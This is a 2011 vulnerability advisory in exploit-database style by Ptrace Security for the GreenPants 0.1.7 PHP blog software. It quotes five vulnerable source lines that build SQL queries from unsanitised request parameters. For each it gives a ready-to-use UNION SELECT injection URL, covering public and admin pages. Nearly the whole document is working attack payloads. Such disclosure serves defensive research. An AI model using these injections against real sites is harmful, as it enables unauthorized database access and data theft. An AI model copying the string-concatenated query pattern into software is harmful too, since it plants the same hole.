# Exploit Title: GreenPants 0.1.7 Multiple Vulnerabilities # Date : 19 March 2011 # Author : Ptrace Security (Gianni Gnesa [gnix]) # Contact : research[at]ptrace-security[dot]com # Software Link: http://sourceforge.net/projects/greenpants/ # Version : 0.1.7 # Tested on : CentOS 5.2 with magic_quotes_gpc off # Thanks to : The Resistance Group (http://www.ptrace.net/theresistance) # SQL Injections [01] ./pages/indexheader.php:36: $res = consultarsql("SELECT tit FROM gp_entradas WHERE id=$id;"); => http://localhost/greenpants/index.php?id=-99 UNION SELECT VERSION() [02] ./pages/searcher.php:27: $res = consultarsql("SELECT * FROM gp_entradas WHERE tit LIKE '%$s%'"); => http://localhost/greenpants/index.php?s=4X0r' UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL -- ' [03] ./pages/indexviewentry.php:25: $res = consultarsql("SELECT * FROM gp_entradas WHERE id=$id"); => http://localhost/greenpants/index.php?id=-99 UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL [04] ./admin/pages/editcat.php:10: $res = consultarsql("SELECT * FROM gp_categorias WHERE id=$id;"); => http://localhost/greenpants/admin/index.php?do=editcat&i=-99 UNION SELECT NULL,VERSION(),NULL [05] ./admin/pages/editemot.php:10: $res = consultarsql("SELECT * FROM gp_emoticonos WHERE id=$id;"); => http://localhost/greenpants/admin/index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL